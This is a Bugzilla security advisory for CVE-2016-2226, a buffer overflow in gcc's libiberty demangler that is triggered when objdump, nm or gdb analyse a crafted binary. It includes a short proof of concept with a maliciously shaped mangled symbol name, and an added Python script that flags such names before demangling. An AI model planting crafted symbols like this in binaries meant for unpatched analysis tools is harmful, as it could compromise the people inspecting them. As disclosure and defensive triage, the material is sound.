Bugzilla – Bug 978812
VUL-1: CVE-2016-2226: gcc: Exploitable buffer overflow
Last modified: 2023-02-08 16:51:19 UTC
rh#1333322 / CVE-2016-2226

A vulnerability was found in gcc. Specifically, it revolves around demangling while analysing untrusted binaries. A particularly malicious attacker could craft an executable that executes when *analysed* by objdump, nm or gdb, or any other libbfd/libiberty-based forensics tool (if the demangling option is switched on).

External references:
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687

References:
http://seclists.org/oss-sec/2016/q2/238

Upstream fix:
https://gcc.gnu.org/viewcvs/gcc?view=revision&revision=234829

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1333322
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2226
http://seclists.org/oss-sec/2016/q2/240
POC for PR69687
========================

** GDB and BINUTILS

$ cat compileme.c
#include <stdio.h>

/* Global with a symbol name shaped like a legacy GNU v2 mangled name;
   the demangler in libiberty chokes on it when -C / demangling is enabled. */
const char *__020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000 = "Hello World";

int main(void)
{
    printf("%s\n", __020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000);
    return 0;
}
$ g++ compileme.c -o compileme
$ ./compileme
Hello World!
$ gdb ./compileme
..
$ objdump -x -C ./compileme
..
$ nm -C ./compileme
..
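As an added triage helper (not part of the bug report, the PoC or the upstream fix), the following Python script parses the output of plain `nm` run without `-C`, so the libiberty demangler is never invoked, and flags raw symbol names that are unusually long or composed mostly of digits and underscores, the shape of the identifier in the PoC above. Such names can then be reviewed before the sample is handed to anything that demangles (`nm -C`, `objdump -C`, `c++filt`, or loading it into gdb). The sample `nm` output, the length and ratio thresholds, and the `__` / `_Z` "looks mangled" heuristic are all constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample of `nm` output WITHOUT -C (no demangling). It includes the
# symbol name from the PoC above plus a few ordinary symbols for contrast.
SAMPLE_NM_OUTPUT = """\
0000000000001139 T main
0000000000002004 R __020A___________________X00020A___R0020A__U000R03000N99999999_020A__K000
                 U printf@GLIBC_2.2.5
0000000000004010 D __data_start
0000000000001040 T _start
0000000000001135 T _Z3fooiPc
"""

# Thresholds are assumptions chosen for this example, not values from the report.
MAX_SANE_LENGTH = 64          # longer mangled names are worth a manual look
DIGIT_UNDERSCORE_RATIO = 0.6  # body dominated by digits/underscores, as in the PoC

# Default `nm` line: optional hex address, one-letter symbol type, symbol name.
# Undefined symbols ("U") have no address, only leading whitespace.
NM_LINE = re.compile(r"^(?P<addr>[0-9a-fA-F]*)\s+(?P<type>[A-Za-z?])\s+(?P<name>\S+)$")


def parse_nm(output: str) -> List[Dict[str, str]]:
    """Parse plain `nm` output into dicts with addr/type/name (addr empty if undefined)."""
    symbols = []
    for line in output.splitlines():
        m = NM_LINE.match(line.rstrip())
        if m:
            symbols.append(m.groupdict())
    return symbols


def looks_mangled(name: str) -> bool:
    """Coarse heuristic (assumption): Itanium ABI names start with _Z, and the
    PoC-style legacy names carry a '__' separator. Plain C names are skipped."""
    return name.startswith("_Z") or "__" in name


def is_suspicious(name: str) -> bool:
    """True if the name would reach the demangler and is either very long or
    made up mostly of digits and underscores."""
    if not looks_mangled(name):
        return False
    if len(name) > MAX_SANE_LENGTH:
        return True
    body = name.lstrip("_")
    if not body:
        return False
    ratio = sum(ch.isdigit() or ch == "_" for ch in body) / len(body)
    return ratio > DIGIT_UNDERSCORE_RATIO


def triage(output: str) -> List[str]:
    """Return raw symbol names to review before any demangling tool sees the sample."""
    return [s["name"] for s in parse_nm(output) if is_suspicious(s["name"])]


if __name__ == "__main__":
    # In practice feed it `nm ./sample` (no -C) via a pipe or subprocess.
    for name in triage(SAMPLE_NM_OUTPUT):
        print(f"suspicious symbol ({len(name)} chars): {name}")
```

The script deliberately works on the non-demangled listing: the point of the advisory is that the demangling step itself is the dangerous part, so the review happens on raw names first and demangling is only enabled once the binutils/gdb build in use is known to carry the upstream fix.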
bugbot adjusting priority
Bug in name demangling -> VUL-1
Fixed a long time ago. (libiberty, and hence binutils, was affected; fixed by version updates to binutils for SLE-12 and SLE-15; SLE-11 wontfix)